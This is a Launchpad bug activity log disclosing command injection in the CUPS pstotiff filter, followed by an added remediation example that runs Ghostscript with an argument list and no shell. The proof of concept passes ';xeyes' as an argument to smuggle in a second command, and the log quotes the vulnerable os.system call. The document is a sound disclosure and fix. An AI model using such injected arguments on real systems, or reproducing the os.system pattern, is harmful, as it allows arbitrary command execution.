Activity log for bug #1599832

Date Who What changed Old value New value Message
2016-07-07 12:06:04 Bernd Dietzel bug added bug
2016-07-07 12:06:04 Bernd Dietzel attachment added Screenshot https://bugs.launchpad.net/bugs/1599832/+attachment/4696828/+files/Bildschirmfoto%20vom%202016-07-07%2013%3A53%3A21.png
2016-07-12 11:14:15 Bernd Dietzel description

Old value:

Prove of concept which will run the program xeyes but should not:

    python /usr/lib/cups/filter/pstotiff 1 2 3 4 5 ";xeyes"

reason : sys.argv[6] is passed to a os.system call :

    ...
    temp_in_file = "-"
    if (len(sys.argv) > 6):
        temp_in_file = sys.argv[6]

    temp_out_handle, temp_out_fname = tempfile.mkstemp()
    font = "-I/usr/share/cups/fonts"
    device = "-dNOINTERPOLATE -sDEVICE=tiffg4 -dMaxStripSize=0 -r204x196 -dNOPAUSE -dBATCH -dSAFER -dPARANOIDSAFER -dSHORTERRORS -dWRITESYSTEMDICT -dGHOSTSCRIPT -sstdout=%stderr -sOutputFile=" + temp_out_fname + " " + temp_in_file
    gs_command = "/usr/bin/gs" + " " + font + " " + device
    exit_code = os.system(gs_command)
    ...

New value:

Proof of concept which will run the program xeyes but should not:

    python /usr/lib/cups/filter/pstotiff 1 2 3 4 5 ";xeyes"

reason : sys.argv[6] is passed to this os.system call :

    exit_code = os.system(gs_command)
2016-08-13 10:23:47 Bernd Dietzel information type Private Security Public Security
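
Added example, not part of the bug report and not the filter's own code: the same gs invocation built as an argument list and run without a shell, so the value of sys.argv[6] reaches the child as one literal argument. The names build_gs_argv, run_gs and echo_argv are hypothetical, and the "./" prefix for names that start with "-" is an assumption of this example.

```python
import subprocess
import sys

GS = "/usr/bin/gs"
FONT = "-I/usr/share/cups/fonts"
# Same options as the report's `device` string, one list element each.
DEVICE_OPTS = [
    "-dNOINTERPOLATE", "-sDEVICE=tiffg4", "-dMaxStripSize=0", "-r204x196",
    "-dNOPAUSE", "-dBATCH", "-dSAFER", "-dPARANOIDSAFER", "-dSHORTERRORS",
    "-dWRITESYSTEMDICT", "-dGHOSTSCRIPT", "-sstdout=%stderr",
]


def build_gs_argv(temp_in_file, temp_out_fname, gs=GS):
    """Build the gs command as an argument list, so no shell parses it."""
    if temp_in_file != "-" and temp_in_file.startswith("-"):
        # Assumption of this example: turn an option-looking name into a path.
        temp_in_file = "./" + temp_in_file
    return [gs, FONT, *DEVICE_OPTS, "-sOutputFile=" + temp_out_fname, temp_in_file]


def run_gs(temp_in_file, temp_out_fname):
    """Replacement for os.system(gs_command): argv list, shell=False (the default)."""
    return subprocess.call(build_gs_argv(temp_in_file, temp_out_fname))


def echo_argv(argv):
    """Stand-in for gs: pass argv[1:] to a child Python that echoes what it received."""
    child = [sys.executable, "-c", "import sys; print('\\n'.join(sys.argv[1:]))"]
    done = subprocess.run(child + argv[1:], capture_output=True, text=True, check=True)
    return done.stdout.splitlines()


if __name__ == "__main__":
    # Constructed input: the argument value from the report's proof of concept.
    argv = build_gs_argv(";xeyes", "/tmp/constructed-out.tif")
    print(echo_argv(argv)[-1])
```

echo_argv exists only so the behaviour can be checked on a machine without Ghostscript; run_gs is the call that would take the place of os.system.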